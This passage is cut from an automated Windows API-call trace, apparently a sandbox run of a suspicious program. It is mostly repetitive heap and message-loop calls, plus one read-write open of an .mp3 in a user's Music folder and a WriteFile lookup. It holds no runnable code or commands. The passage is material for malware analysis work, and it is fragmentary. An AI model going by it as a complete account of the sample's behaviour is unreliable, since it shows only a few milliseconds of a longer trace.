out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.230] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.231] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0_h8m557-v1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0037.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.233] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.237] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.237] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, 